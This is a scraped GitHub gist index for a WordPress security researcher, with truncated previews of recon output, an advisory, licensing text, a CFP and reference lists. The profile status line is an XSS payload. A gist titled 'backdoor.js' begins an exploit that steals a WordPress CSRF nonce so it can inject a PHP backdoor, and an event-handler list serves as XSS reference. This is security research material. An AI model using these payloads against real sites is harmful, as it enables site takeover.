Skip to content

Instantly share code, notes, and snippets.

View ethicalhack3r's full-sized avatar
💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"

Ryan Dewhurst ethicalhack3r

💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"
1.2k followers · 9 following
View GitHub Profile
@ethicalhack3r
ethicalhack3r / gist:cb06f575c6ba28644e9a
Created September 18, 2014 18:29
who.is XSS
$ ./dnsrecon.py -d jamiehankins.co.uk
[*] Performing General Enumeration of Domain: jamiehankins.co.uk
[-] DNSSEC is not configured for jamiehankins.co.uk
[*] SOA hank.ns.cloudflare.com 173.245.59.116
[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS hank.ns.cloudflare.com 173.245.59.116
[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS lucy.ns.cloudflare.com 173.245.58.133
[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
[*] MX aspmx2.googlemail.com 74.125.143.27
@ethicalhack3r
ethicalhack3r / pluggable.php
Created November 18, 2014 15:41
WordPress authentication cookie generation using default keys
<?php
if ( !function_exists('wp_generate_auth_cookie') ) :
/**
* Generate authentication cookie contents.
*
* @since 2.5.0
*
* @param int $user_id User ID
* @param int $expiration Cookie expiration in seconds
@ethicalhack3r
ethicalhack3r / advisory
Created December 6, 2014 09:39
Satoshi v2.0 - CSRF
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js
Localhost Demo:
@ethicalhack3r
ethicalhack3r / gist:66de53fb6a110f2834b9
Created January 18, 2015 17:20
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872
@ethicalhack3r
ethicalhack3r / license.txt
Created January 21, 2015 14:17
WPScan Public Source License
WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
Definitions
“License” means this document.
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
@ethicalhack3r
ethicalhack3r / post.txt
Created January 21, 2015 14:18
WPScan Licensing
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
@ethicalhack3r
ethicalhack3r / backdoor.js
Last active May 3, 2023 16:53
wp backdoor exploit (injects a PHP backdoor)
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
@ethicalhack3r
ethicalhack3r / chrome-uri.txt
Last active February 20, 2024 03:02
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from https://gsdview.appspot.com/chromium-browser-official/). A lot will not work, some are probably from unit tests.
chrome://-alkuisissa
chrome://-nettadresser
chrome://-webbadresser
chrome://ChromeTestChromeWebUIControllerFactory
chrome://DummyURL
chrome://URLs
chrome://about
chrome://accessibility
chrome://anything
chrome://app-list
@ethicalhack3r
ethicalhack3r / euskalhack.md
Created February 29, 2016 15:36
[CFP] EuskalHack (San Sebastian / Donostia) 2016

Introduction

EuskalHack Security Congress is the first Ethical Hacking association in Euskadi, with the aim of promoting the community and culture in digital security to anyone who may be interested.

This exclusive conference is shaping up to be the most relevant in the Basque Country, with an estimated 125 attendees for the first edition.

The participants include specialised companies, state security organisations, professionals, hobbyists and students in the area of security and Information Technology.

Estimated date and location

@ethicalhack3r
ethicalhack3r / events.txt
Last active March 3, 2023 07:41
List of event attributes
loadedstart
onabort
onafterprint
onanimationend
onanimationiteration
onanimationstart
onautocomplete
onautocompleteerror
onbeforecopy
onbeforecut